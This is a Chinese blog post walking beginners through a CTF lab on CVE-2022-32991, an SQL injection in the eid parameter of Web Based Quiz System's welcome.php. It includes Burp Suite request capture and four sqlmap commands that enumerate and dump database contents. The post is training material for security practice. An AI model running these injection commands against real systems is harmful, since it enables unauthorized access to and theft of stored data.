春秋云镜 CVE-2022-32991 Web Based Quiz System v1.0 [超详细新手教程]

已于 2022-10-26 14:38:58 修改
阅读量759 收藏 2
点赞数 1
文章标签: php 开发语言 web安全 网络安全
于 2022-10-26 12:19:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/starttv/article/details/127528181
版权

文章目录

提示:以下是本篇文章正文内容,下面案例可供参考

一、 靶场介绍

该CMS的welcome.php中存在SQL注入攻击。

Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。

二、 简单分析

先进入靶场,可以看到LOGIN和REGISTER,我们先注册一个账号,点击LOGIN进入CMS。
在这里插入图片描述
进入之后我们观察url,发现我们此时就在welcome.php,并且url后面跟着一个参数q

在这里插入图片描述
审计源代码可以发现welcome.php中的参数没有进行过滤,而且eid参数可控,此处存在SQL注入
在这里插入图片描述

到这里思路基本清晰,答案也呼之欲出。直接用sqlmap一把梭。
源代码下载地址

https://www.123pan.com/s/WAYKVv-6y8wh
提取码:t2Oc

先随便点击一个start
在这里插入图片描述

先用Burp Suite抓包
在这里插入图片描述

然后右键,选择Copy to fIle,保存为sql.txt
在这里插入图片描述
在终端输入以下命令:

获取数据库名
sqlmap -r 1.txt --dbs --random-agent -p eid

获取表名
sqlmap -r 1.txt -D ctf --tables --random-agent -p eid

获取列名
sqlmap -r 1.txt -D ctf -T flag --columns --random-agent -p eid

获取flag
sqlmap -r 1.txt -D ctf -T flag -C flag --dump --random-agent -p eid

Sn_u
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
春秋云境】CVE-2022-32991靶场wp
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云镜——CVE-2022-32991
qq_51175992的博客
10-10 402
给到提示注入点是welcome.php的eid参数,因此需要在welcome.php的界面下关注get请求的eid参数部分。
春秋云境 CVE-2022-32991
qq_44640313的博客
05-13 285
Web Based Quiz System SQL注入,CVE-2022-32991漏洞
CVE-2022-32991靶场复现
m0_73734159的博客
10-27 703
由于没有注入窗口,所以想到了,火狐+burpsuite+sqlmap组合拷打。复制带有eid参数的页面网址,用火狐浏览器打开,进行burpsuite抓包。箭头所指方向存在welcome.php文件但是参数不是eid,而是p。题目提示了该CMS的welcome.php中存在SQL注入攻击。welcome.php页面存在SQL注入,并且这个参数是eid。下方有Start开始按钮,点点试试,看看有没有新的发现。创建一个txt文件,将数据包复制到这个txt文件里面。注入前的准备工作,了解sqlmap的部分参数。
Web Based Quiz System SQL注入
weixin_46420165的博客
12-08 612
Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。受影响的是未知功能文件:welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入 (漏洞地址在下面写出)
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server权限提升漏洞 和 CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p...
春秋云镜 CVE-2022-32991
qq_22002773的博客
06-21 338
CVE-2022-32991
春秋云境】CVE-2022-32991靶场WP
果粒程
11-25 474
春秋云境】CVE-2022-32991靶场WP
CVE-2022-32991
sinat_25635183的博客
03-25 428
2、CVE-2022-32991Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。但是提示sqlmap的版本过时了, "your sqlmap version is outdated",那么就意味着你当前使用的 sqlmap版本可能已经不是最新版本,建议你及时更新到最新版本以确保工具的效用和安全性。使用sqlmap工具(本人使用的是kali下的sqlmap)猜测数据库为:ctf。
春秋云境—Initial
龙狼刺的博客
07-15 1847
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
Web Based Quiz System SQL注入漏洞复现(CVE-2022-32991
千寻的博客
11-25 1050
`Sourcecodester Web Based Quiz System`是 (`Sourcecodester`)开源的一个应用软件。用于一个简单的在线基础的项目。 `Web Based Quiz System v1.0`版本存在安全漏洞,该漏洞源于通过` welcome.php `中的`eid` 参数发现存在 SQL 注入漏洞。该CMS的welcome.php中存在SQL注入攻击。
WP-春秋云镜-Brute4Road靶场通关完全指南
qq_45234543的博客
12-30 2670
春秋云镜-Brute4Road靶场通关指南,完全通关指南手把手教学
[春秋云镜] CVE-2022-28060 详细讲解
weixin_60374959的博客
11-28 2814
Victor CMS v1.0 /includes/login.php 存在sql注入。
CVE-2022-32991 Web Based Quiz System SQL注入
qq_38733240的博客
11-19 655
Web Based Quiz System 1.0中曾发现一漏洞,此漏洞被分类为致命。受影响的是未知功能文件:welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入。
春秋云境】CVE-2022-32991
m0_49025459的博客
03-21 228
接下来我们使用bp,抓到点击start的包,放到txt文件中,命名为1.txt。,发现基于 Web 的测验系统 v1.0 通过。然后到sqlmap里面使用命令爆破出我要的数据。包含一个 SQL 注入漏洞。随便注册个账号能登录就。
春秋云镜CVE-2022-30887
09-05
春秋云镜CVE-2022-30887是指Pharmacy Management System文件上传漏洞,该漏洞的CVE编号为CVE-2022-30887。此漏洞可能允许攻击者通过上传恶意文件利用系统中的漏洞。请注意,由于未提供更多信息,我无法提供详细的修复建议。建议您及时升级系统或软件,并参考官方渠道获取最新的安全信息和修复方案,以确保系统的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [春秋云境:CVE-2022-30887](https://blog.csdn.net/laobanjiull/article/details/128100253)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值